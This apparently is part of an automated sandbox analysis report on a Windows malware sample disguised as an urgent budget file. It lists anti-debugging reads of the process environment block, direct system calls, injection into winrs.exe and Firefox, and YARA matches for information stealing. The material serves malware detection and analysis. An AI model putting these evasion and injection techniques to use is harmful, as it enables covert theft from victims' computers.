        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33571763 mov eax, dword ptr fs:[00000030h]2_2_33571763
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33571763 mov eax, dword ptr fs:[00000030h]2_2_33571763
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33571763 mov eax, dword ptr fs:[00000030h]2_2_33571763
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33571763 mov eax, dword ptr fs:[00000030h]2_2_33571763
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33571763 mov eax, dword ptr fs:[00000030h]2_2_33571763
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33571763 mov eax, dword ptr fs:[00000030h]2_2_33571763
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3353471B mov eax, dword ptr fs:[00000030h]2_2_3353471B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3353471B mov eax, dword ptr fs:[00000030h]2_2_3353471B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335EF717 mov eax, dword ptr fs:[00000030h]2_2_335EF717
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3353D700 mov ecx, dword ptr fs:[00000030h]2_2_3353D700
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335F970B mov eax, dword ptr fs:[00000030h]2_2_335F970B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335F970B mov eax, dword ptr fs:[00000030h]2_2_335F970B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352B705 mov eax, dword ptr fs:[00000030h]2_2_3352B705
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352B705 mov eax, dword ptr fs:[00000030h]2_2_3352B705
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352B705 mov eax, dword ptr fs:[00000030h]2_2_3352B705
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352B705 mov eax, dword ptr fs:[00000030h]2_2_3352B705
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355270D mov eax, dword ptr fs:[00000030h]2_2_3355270D
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355270D mov eax, dword ptr fs:[00000030h]2_2_3355270D
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355270D mov eax, dword ptr fs:[00000030h]2_2_3355270D
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33559723 mov eax, dword ptr fs:[00000030h]2_2_33559723
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335EF7CF mov eax, dword ptr fs:[00000030h]2_2_335EF7CF
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335377F9 mov eax, dword ptr fs:[00000030h]2_2_335377F9
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335377F9 mov eax, dword ptr fs:[00000030h]2_2_335377F9
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355E7E0 mov eax, dword ptr fs:[00000030h]2_2_3355E7E0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335337E4 mov eax, dword ptr fs:[00000030h]2_2_335337E4
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335337E4 mov eax, dword ptr fs:[00000030h]2_2_335337E4
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335337E4 mov eax, dword ptr fs:[00000030h]2_2_335337E4
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335337E4 mov eax, dword ptr fs:[00000030h]2_2_335337E4
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335337E4 mov eax, dword ptr fs:[00000030h]2_2_335337E4
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335337E4 mov eax, dword ptr fs:[00000030h]2_2_335337E4
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335337E4 mov eax, dword ptr fs:[00000030h]2_2_335337E4
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33561796 mov eax, dword ptr fs:[00000030h]2_2_33561796
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33561796 mov eax, dword ptr fs:[00000030h]2_2_33561796
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335AE79D mov eax, dword ptr fs:[00000030h]2_2_335AE79D
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335AE79D mov eax, dword ptr fs:[00000030h]2_2_335AE79D
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335AE79D mov eax, dword ptr fs:[00000030h]2_2_335AE79D
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335AE79D mov eax, dword ptr fs:[00000030h]2_2_335AE79D
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335AE79D mov eax, dword ptr fs:[00000030h]2_2_335AE79D
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335AE79D mov eax, dword ptr fs:[00000030h]2_2_335AE79D
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335AE79D mov eax, dword ptr fs:[00000030h]2_2_335AE79D
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335AE79D mov eax, dword ptr fs:[00000030h]2_2_335AE79D
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335AE79D mov eax, dword ptr fs:[00000030h]2_2_335AE79D
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_336017BC mov eax, dword ptr fs:[00000030h]2_2_336017BC
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3360B781 mov eax, dword ptr fs:[00000030h]2_2_3360B781
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3360B781 mov eax, dword ptr fs:[00000030h]2_2_3360B781
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335307A7 mov eax, dword ptr fs:[00000030h]2_2_335307A7
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335FD7A7 mov eax, dword ptr fs:[00000030h]2_2_335FD7A7
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335FD7A7 mov eax, dword ptr fs:[00000030h]2_2_335FD7A7
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335FD7A7 mov eax, dword ptr fs:[00000030h]2_2_335FD7A7
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33565654 mov eax, dword ptr fs:[00000030h]2_2_33565654
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3353965A mov eax, dword ptr fs:[00000030h]2_2_3353965A
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3353965A mov eax, dword ptr fs:[00000030h]2_2_3353965A
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356265C mov eax, dword ptr fs:[00000030h]2_2_3356265C
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356265C mov ecx, dword ptr fs:[00000030h]2_2_3356265C
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356265C mov eax, dword ptr fs:[00000030h]2_2_3356265C
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33533640 mov eax, dword ptr fs:[00000030h]2_2_33533640
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3354F640 mov eax, dword ptr fs:[00000030h]2_2_3354F640
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3354F640 mov eax, dword ptr fs:[00000030h]2_2_3354F640
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3354F640 mov eax, dword ptr fs:[00000030h]2_2_3354F640
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356C640 mov eax, dword ptr fs:[00000030h]2_2_3356C640
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356C640 mov eax, dword ptr fs:[00000030h]2_2_3356C640
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352D64A mov eax, dword ptr fs:[00000030h]2_2_3352D64A
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352D64A mov eax, dword ptr fs:[00000030h]2_2_3352D64A
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33530670 mov eax, dword ptr fs:[00000030h]2_2_33530670
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33572670 mov eax, dword ptr fs:[00000030h]2_2_33572670
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33572670 mov eax, dword ptr fs:[00000030h]2_2_33572670
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33527662 mov eax, dword ptr fs:[00000030h]2_2_33527662
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33527662 mov eax, dword ptr fs:[00000030h]2_2_33527662
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33527662 mov eax, dword ptr fs:[00000030h]2_2_33527662
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33543660 mov eax, dword ptr fs:[00000030h]2_2_33543660
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33543660 mov eax, dword ptr fs:[00000030h]2_2_33543660
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33543660 mov eax, dword ptr fs:[00000030h]2_2_33543660
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356666D mov esi, dword ptr fs:[00000030h]2_2_3356666D
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356666D mov eax, dword ptr fs:[00000030h]2_2_3356666D
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356666D mov eax, dword ptr fs:[00000030h]2_2_3356666D
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335C3608 mov eax, dword ptr fs:[00000030h]2_2_335C3608
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335C3608 mov eax, dword ptr fs:[00000030h]2_2_335C3608
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335C3608 mov eax, dword ptr fs:[00000030h]2_2_335C3608
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335C3608 mov eax, dword ptr fs:[00000030h]2_2_335C3608
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335C3608 mov eax, dword ptr fs:[00000030h]2_2_335C3608
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335C3608 mov eax, dword ptr fs:[00000030h]2_2_335C3608
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355D600 mov eax, dword ptr fs:[00000030h]2_2_3355D600
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355D600 mov eax, dword ptr fs:[00000030h]2_2_3355D600
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335EF607 mov eax, dword ptr fs:[00000030h]2_2_335EF607
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356360F mov eax, dword ptr fs:[00000030h]2_2_3356360F
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33604600 mov eax, dword ptr fs:[00000030h]2_2_33604600
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33530630 mov eax, dword ptr fs:[00000030h]2_2_33530630
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33560630 mov eax, dword ptr fs:[00000030h]2_2_33560630
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335B8633 mov esi, dword ptr fs:[00000030h]2_2_335B8633
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335B8633 mov eax, dword ptr fs:[00000030h]2_2_335B8633
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335B8633 mov eax, dword ptr fs:[00000030h]2_2_335B8633
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356F63F mov eax, dword ptr fs:[00000030h]2_2_3356F63F
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356F63F mov eax, dword ptr fs:[00000030h]2_2_3356F63F
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33537623 mov eax, dword ptr fs:[00000030h]2_2_33537623
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335DD62C mov ecx, dword ptr fs:[00000030h]2_2_335DD62C
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335DD62C mov ecx, dword ptr fs:[00000030h]2_2_335DD62C
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335DD62C mov eax, dword ptr fs:[00000030h]2_2_335DD62C
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33535622 mov eax, dword ptr fs:[00000030h]2_2_33535622
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33535622 mov eax, dword ptr fs:[00000030h]2_2_33535622
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356C620 mov eax, dword ptr fs:[00000030h]2_2_3356C620
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355D6D0 mov eax, dword ptr fs:[00000030h]2_2_3355D6D0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335306CF mov eax, dword ptr fs:[00000030h]2_2_335306CF
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335FA6C0 mov eax, dword ptr fs:[00000030h]2_2_335FA6C0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335D86C2 mov eax, dword ptr fs:[00000030h]2_2_335D86C2
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335AC6F2 mov eax, dword ptr fs:[00000030h]2_2_335AC6F2
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335AC6F2 mov eax, dword ptr fs:[00000030h]2_2_335AC6F2
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335296E0 mov eax, dword ptr fs:[00000030h]2_2_335296E0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335296E0 mov eax, dword ptr fs:[00000030h]2_2_335296E0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3353C6E0 mov eax, dword ptr fs:[00000030h]2_2_3353C6E0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335356E0 mov eax, dword ptr fs:[00000030h]2_2_335356E0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335356E0 mov eax, dword ptr fs:[00000030h]2_2_335356E0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335356E0 mov eax, dword ptr fs:[00000030h]2_2_335356E0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335566E0 mov eax, dword ptr fs:[00000030h]2_2_335566E0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335566E0 mov eax, dword ptr fs:[00000030h]2_2_335566E0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33538690 mov eax, dword ptr fs:[00000030h]2_2_33538690
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335AD69D mov eax, dword ptr fs:[00000030h]2_2_335AD69D
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335BC691 mov eax, dword ptr fs:[00000030h]2_2_335BC691
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335EF68C mov eax, dword ptr fs:[00000030h]2_2_335EF68C
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33540680 mov eax, dword ptr fs:[00000030h]2_2_33540680
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33540680 mov eax, dword ptr fs:[00000030h]2_2_33540680
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33540680 mov eax, dword ptr fs:[00000030h]2_2_33540680
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33540680 mov eax, dword ptr fs:[00000030h]2_2_33540680
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33540680 mov eax, dword ptr fs:[00000030h]2_2_33540680
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33540680 mov eax, dword ptr fs:[00000030h]2_2_33540680
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33540680 mov eax, dword ptr fs:[00000030h]2_2_33540680
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33540680 mov eax, dword ptr fs:[00000030h]2_2_33540680
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33540680 mov eax, dword ptr fs:[00000030h]2_2_33540680

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe | NtOpenFile: Direct from: 0x77AF2CEC
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe | NtAllocateVirtualMemory: Direct from: 0x77AF3BBC
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe | NtSetInformationThread: Direct from: 0x77AE6319
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe | NtQueryInformationToken: Direct from: 0x77AF2BCC
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe | NtReadVirtualMemory: Direct from: 0x77AF2DAC
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe | NtQueryVolumeInformationFile: Direct from: 0x77AF2E4C
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe | NtDeviceIoControlFile: Direct from: 0x77AF2A0C
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe | NtQuerySystemInformation: Direct from: 0x77AF47EC
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe | NtCreateKey: Direct from: 0x77AF2B8C
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe | NtSetInformationThread: Direct from: 0x77AF2A6C
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe | NtQueryAttributesFile: Direct from: 0x77AF2D8C
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe | NtProtectVirtualMemory: Direct from: 0x77AE7A4E
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe | NtCreateFile: Direct from: 0x77AF2F0C
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe | NtAllocateVirtualMemory: Direct from: 0x77AF2B0C
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe | NtOpenSection: Direct from: 0x77AF2D2C
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe | NtOpenKeyEx: Direct from: 0x77AF2ABC
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe | NtQueryInformationProcess: Direct from: 0x77AF2B46
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe | NtResumeThread: Direct from: 0x77AF2EDC
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe | NtDelayExecution: Direct from: 0x77AF2CFC
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe | NtAllocateVirtualMemory: Direct from: 0x77AF480C
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe | NtClose: Direct from: 0x77AF2A8C
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe | NtCreateUserProcess: Direct from: 0x77AF363C
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe | NtProtectVirtualMemory: Direct from: 0x77AF2EBC
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe | NtWriteVirtualMemory: Direct from: 0x77AF482C
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe | NtWriteVirtualMemory: Direct from: 0x77AF2D5C
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe | NtMapViewOfSection: Direct from: 0x77AF2C3C
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe | NtResumeThread: Direct from: 0x77AF35CC
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe | NtAllocateVirtualMemory: Direct from: 0x77AF2B1C
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe | NtSetInformationProcess: Direct from: 0x77AF2B7C
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe | NtNotifyChangeKey: Direct from: 0x77AF3B4C
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe | NtReadFile: Direct from: 0x77AF29FC
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe | NtQuerySystemInformation: Direct from: 0x77AF2D1C
        Source: C:\Users\user\Desktop\presupuesto urgente.exe | Section loaded: NULL target: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\presupuesto urgente.exe | Section loaded: NULL target: C:\Windows\SysWOW64\winrs.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\winrs.exe | Section loaded: NULL target: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe protection: read write
        Source: C:\Windows\SysWOW64\winrs.exe | Section loaded: NULL target: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\winrs.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
        Source: C:\Windows\SysWOW64\winrs.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\winrs.exe | Thread register set: target process: 2460
        Source: C:\Users\user\Desktop\presupuesto urgente.exe | Process created: C:\Users\user\Desktop\presupuesto urgente.exe "C:\Users\user\Desktop\presupuesto urgente.exe"
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe | Process created: C:\Windows\SysWOW64\winrs.exe "C:\Windows\SysWOW64\winrs.exe"
        Source: C:\Windows\SysWOW64\winrs.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: qnFwqCOYxcUlZ.exe, 00000003.00000002.12651067325.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp, qnFwqCOYxcUlZ.exe, 00000003.00000000.8278117204.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
        Source: qnFwqCOYxcUlZ.exe, 00000003.00000002.12651067325.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp, qnFwqCOYxcUlZ.exe, 00000003.00000000.8278117204.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
        Source: qnFwqCOYxcUlZ.exe, 00000003.00000002.12651067325.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp, qnFwqCOYxcUlZ.exe, 00000003.00000000.8278117204.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
        Source: qnFwqCOYxcUlZ.exe, 00000003.00000002.12651067325.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp, qnFwqCOYxcUlZ.exe, 00000003.00000000.8278117204.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
        Source: C:\Users\user\Desktop\presupuesto urgente.exe | Code function: 0_2_00403489 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403489

        Stealing of Sensitive Information

        Source: Yara match | File source: 00000004.00000002.12649287914.0000000003010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000002.00000002.8372536747.00000000331E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000003.00000002.12650331699.00000000013B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000003.00000002.12651774675.0000000003A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
